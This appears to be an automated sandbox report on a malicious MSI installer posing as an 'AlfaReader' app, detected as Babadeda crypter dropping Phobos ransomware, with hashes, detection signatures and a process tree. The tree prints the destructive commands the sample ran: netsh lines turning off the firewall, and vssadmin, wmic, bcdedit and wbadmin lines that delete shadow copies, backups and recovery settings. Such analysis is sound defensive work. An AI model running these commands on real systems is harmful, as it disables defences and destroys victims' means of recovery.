Analysis

  • max time kernel
    4294196s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20220223-en
  • submitted
    28-02-2022 18:42

General

  • Target

    7eb1b46c43a2290eb2631ea061da7258591e37da9f784e9dc890f1a27d292d9e.msi

  • Size

    5.8MB

  • MD5

    114daaf4ec2fa86c801300439044d946

  • SHA1

    9da80d1bed43da4c74f4a0957a580d4e7839f434

  • SHA256

    7eb1b46c43a2290eb2631ea061da7258591e37da9f784e9dc890f1a27d292d9e

  • SHA512

    ec9333ab61e3e61b4c373dc349d8ecff7145c6bc59b409b658ea2bd2c45ad441ce1a121ac9515764c8c2d2642c5175b8ca6d40328cf84f700dd156e2fbaeb8e0

Malware Config

Signatures

  • Babadeda

    Babadeda is a crypter delivered as a legitimate installer and used to drop other malware families.

  • Babadeda Crypter 3 IoCs
  • Phobos

    Phobos ransomware appeared at the beginning of 2019.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 8 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Deletes backup catalog 3 TTPs 4 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 4 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 63 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 43 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Detects BABADEDA Crypter 3 IoCs

    Detects BABADEDA Crypter.

  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\7eb1b46c43a2290eb2631ea061da7258591e37da9f784e9dc890f1a27d292d9e.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:824
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 1CA0DD9952A851B1122934DE4634C0B2
      2⤵
      • Loads dropped DLL
      PID:1884
    • C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\AAMCustomHook.exe
      "C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\AAMCustomHook.exe"
      2⤵
      • Executes dropped EXE
      PID:1736
    • C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe
      "C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe"
      2⤵
      • Executes dropped EXE
      • Drops startup file
      • Loads dropped DLL
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:944
      • C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe
        "C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        PID:1760
        • C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe
          "C:\Users\Admin\AppData\Roaming\AlfaReader\lfaReader Install\PDapp.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1984
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:576
          • C:\Windows\system32\netsh.exe
            netsh advfirewall set currentprofile state off
            5⤵
              PID:2024
            • C:\Windows\system32\netsh.exe
              netsh firewall set opmode mode=disable
              5⤵
                PID:1532
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1708
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                5⤵
                • Interacts with shadow copies
                PID:820
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic shadowcopy delete
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1468
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                5⤵
                • Modifies boot configuration data using bcdedit
                PID:860
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled no
                5⤵
                • Modifies boot configuration data using bcdedit
                PID:948
              • C:\Windows\system32\wbadmin.exe
                wbadmin delete catalog -quiet
                5⤵
                • Deletes backup catalog
                PID:1544
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta"
              4⤵
              • Modifies Internet Explorer settings
              PID:2416
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta"
              4⤵
              • Modifies Internet Explorer settings
              PID:2440
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\info.hta"
              4⤵
              • Modifies Internet Explorer settings
              PID:2500
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe"
              4⤵
                PID:2524
                • C:\Windows\system32\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  5⤵
                  • Interacts with shadow copies
                  PID:2592
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  5⤵
                    PID:2804
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} bootstatuspolicy ignoreallfailures
                    5⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2984
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} recoveryenabled no
                    5⤵
                    • Modifies boot configuration data using bcdedit
                    PID:3008
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin delete catalog -quiet
                    5⤵
                    • Deletes backup catalog
                    PID:3024
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1152
                • C:\Windows\system32\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  4⤵
                  • Interacts with shadow copies
                  PID:1640
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  4⤵
                    PID:2208
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} bootstatuspolicy ignoreallfailures
                    4⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2240
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} recoveryenabled no
                    4⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2248
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin delete catalog -quiet
                    4⤵
                    • Deletes backup catalog
                    PID:2256
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1196
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall set currentprofile state off
                    4⤵
                      PID:1268
                    • C:\Windows\system32\netsh.exe
                      netsh firewall set opmode mode=disable
                      4⤵
                        PID:764
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      PID:2408
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      PID:2456
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\info.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      PID:2468
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe"
                      3⤵
                        PID:2488
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin delete shadows /all /quiet
                          4⤵
                          • Interacts with shadow copies
                          PID:2584
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic shadowcopy delete
                          4⤵
                            PID:2796
                          • C:\Windows\system32\bcdedit.exe
                            bcdedit /set {default} bootstatuspolicy ignoreallfailures
                            4⤵
                            • Modifies boot configuration data using bcdedit
                            PID:2940
                          • C:\Windows\system32\bcdedit.exe
                            bcdedit /set {default} recoveryenabled no
                            4⤵
                            • Modifies boot configuration data using bcdedit
                            PID:3016
                          • C:\Windows\system32\wbadmin.exe
                            wbadmin delete catalog -quiet
                            4⤵
                            • Deletes backup catalog
                            PID:3032
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:824
                    • C:\Windows\system32\wbengine.exe
                      "C:\Windows\system32\wbengine.exe"
                      1⤵
                        PID:848
                      • C:\Windows\System32\vdsldr.exe
                        C:\Windows\System32\vdsldr.exe -Embedding
                        1⤵
                          PID:844
                        • C:\Windows\System32\vds.exe
                          C:\Windows\System32\vds.exe
                          1⤵
                            PID:632

                          Network

                          MITRE ATT&CK Enterprise v6

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • memory/824-54-0x000007FEFBD61000-0x000007FEFBD63000-memory.dmp

                            Filesize

                            8KB

                          • memory/944-111-0x00000000020A0000-0x00000000020B3000-memory.dmp

                            Filesize

                            76KB

                          • memory/944-131-0x0000000003F90000-0x0000000008190000-memory.dmp

                            Filesize

                            66.0MB

                          • memory/1884-58-0x0000000074FF1000-0x0000000074FF3000-memory.dmp

                            Filesize

                            8KB

                          • memory/1984-128-0x0000000001FA0000-0x0000000001FB3000-memory.dmp

                            Filesize

                            76KB

                          • memory/1984-133-0x0000000003E60000-0x0000000008060000-memory.dmp

                            Filesize

                            66.0MB